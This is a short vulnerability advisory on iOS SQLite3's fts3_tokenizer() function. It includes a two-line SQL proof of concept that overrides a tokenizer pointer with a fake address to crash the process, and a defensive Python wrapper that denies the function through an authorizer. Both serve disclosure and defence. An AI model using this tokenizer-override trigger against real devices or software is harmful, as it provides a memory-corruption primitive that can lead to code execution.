Information

Compiled with the virtual table module FTS3, iOS’s SQLite3 exposes the function fts3_tokenizer().
When called with two arguments, the function registers a new tokenizer or overrides the address of an existing tokenizer.

Crash Dump:


PoC:

SELECT fts3_tokenizer('simple', x'4141414141414141');
CREATE VIRTUAL TABLE vt USING fts3 (content TEXT);
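
A defensive counterpart to the PoC above, added here as an example and not part of the original advisory or of Apple's fix: a Python `sqlite3` wrapper that denies `fts3_tokenizer()` through SQLite's authorizer callback and, where the build exposes it, switches off the two-argument form with `SQLITE_DBCONFIG_ENABLE_FTS3_TOKENIZER`. The names `harden`, `run_untrusted` and `DENIED_FUNCTIONS` are hypothetical.

```python
import sqlite3

# Functions an untrusted query or database schema should never reach.
DENIED_FUNCTIONS = frozenset({"fts3_tokenizer"})


def harden(conn, denied=DENIED_FUNCTIONS):
    """Block the listed SQL functions on this connection; returns the deny log."""
    denied = frozenset(name.lower() for name in denied)
    log = []

    # Layer 1: turn off the two-argument fts3_tokenizer() form where the
    # Python/SQLite build exposes the switch (Connection.setconfig, Python 3.12+).
    op = getattr(sqlite3, "SQLITE_DBCONFIG_ENABLE_FTS3_TOKENIZER", None)
    if op is not None and hasattr(conn, "setconfig"):
        conn.setconfig(op, False)

    # Layer 2: the authorizer runs while a statement is compiled, so a denied
    # function is rejected before any of its code executes.
    def authorizer(action, arg1, arg2, db_name, source):
        # For SQLITE_FUNCTION, arg2 carries the function name.
        if action == sqlite3.SQLITE_FUNCTION and (arg2 or "").lower() in denied:
            log.append(arg2)
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK

    conn.set_authorizer(authorizer)
    return log


def run_untrusted(conn, sql):
    """Run one statement; return ("ok", rows) or ("blocked", error text)."""
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.DatabaseError as exc:
        return "blocked", str(exc)


if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    harden(conn)
    # First statement of the PoC above: refused when the statement is prepared.
    print(run_untrusted(conn, "SELECT fts3_tokenizer('simple', x'4141414141414141')"))
    print(run_untrusted(conn, "SELECT 1 + 1"))
```

On a build without FTS3 the first statement is still reported as blocked, because the function does not exist and preparation fails before the authorizer is consulted.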

Attachments:
Crash.png

References:
https://support.apple.com/en-us/HT210118
https://support.apple.com/en-us/HT210119
https://research.checkpoint.com/select-code_execution-from-using-sqlite/